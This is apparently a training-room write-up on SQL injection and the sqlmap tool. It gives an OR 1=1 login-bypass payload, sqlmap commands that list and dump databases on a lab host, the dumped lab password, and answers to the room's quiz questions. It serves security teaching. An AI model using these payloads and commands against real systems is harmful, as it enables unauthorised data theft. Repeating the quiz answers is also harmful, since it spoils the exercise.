SQLMap: The Basics
Summary
Description: Using SQLMap to automate the process of exploiting SQL vulnerabilities
SQL Injection Vulnerability
What is a SQL Injection?
We have the following User data:
Username: John
Password: JohnnyBoy123
The resulting SQL query looks like this:
SELECT * FROM users WHERE username = 'John' AND password = 'JohnnyBoy123';If the input data is not validated in any way, it makes this SQL query vulnerable to SQL injection by modifying the password input.
Password: abc' OR 1=1; -- -
The resulting Query looks like this:
SELECT * FROM users WHERE username = 'John' AND password = 'abc' OR 1=1;-- -';This works because the final condition will return true. -- comments any remaining characters in the line.
Questions
Which boolean operator checks if at least one side of the operator is true for the condition to be true?
Answer: OR
Is 1=1 in an SQL query always true? (YEA/NAY)
Answer: YEA
Automated SQL Injection Tool
SQLMap
SQLMap automates the process of discovering an SQL vulnerability and manipulating the database. By typing sqlmap --help commands are shown, if you’re lazy to set the flags manually use sqlmap --wizard which guides you through the process.
How to use SQLMap?
Target URL
Target URLs often have GET parameters such as http://sqlmaptesting.thm/search?cat=1. By using the -u flag, you set the URL in SQLMap. Cookie-based testing via --cookie flag is also supported as modern websites rely on sessions. Using the following command, SQLMap searches for SQL vulnerabilities that work on the URL.
sqlmap -u http://sqlmaptesting.thm/search/cat=1
By using the --dbs flag, SQLMap fetches the databases.
sqlmap -u http://sqlmaptesting.thm/search/cat=1 --dbs
By using the -D and --tables flag, SQLMap will extract all tables of the database users.
sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D users --tables
To dump table data, we have to define the database with -D, then the table with -T and --dump to extract the data.
sqlmap -u http://sqlmaptesting.thmsearch/cat=1 -D users -T thomas --dump
POST-based testing (logins, registration forms, etc) can be accomplished by using the -r [FILENAME].txt flag.
Questions
Which flag in the SQLMap tool is used to extract all the databases available?
Answer: —dbs
What would be the full command of SQLMap for extracting all tables from the “members” database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)
Answer: sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members —tables
Practical Exercise
Execution
We get the following IP for the vulnerable machine: 10.82.163.238. The login is located at http://10.82.163.238/ai/login. By opening the website in the browser and looking at the devtools, we see that the following parameters are in the URL: http://10.82.163.238/ai/includes/user_login?email=test&password=test.
First, we need to scan the URL for databases by using the following command:
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" --dbs
However, this does not provide us with all databases, therefore we need to increase the scan-level by adding a additional flag.
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" --dbs --level=5
We get the following databases as result:
[*] ai
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
Now we need to look at the tables that are located within the ai database.
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" -D ai --tables
As a result we only get the user table.
We dump the data by executing the following command:
sqlmap -u "http://10.82.163.238/ai/includes/user_login?email=test&password=test" -D ai -T user --dump
This returns the user data which amounts to only one entry with the password 12345678.
Questions
How many databases are available in this web application?
Answer: 6
What is the name of the table available in the “ai” database?
Answer: user
What is the password of the email test@chatai.com?
Answer: 12345678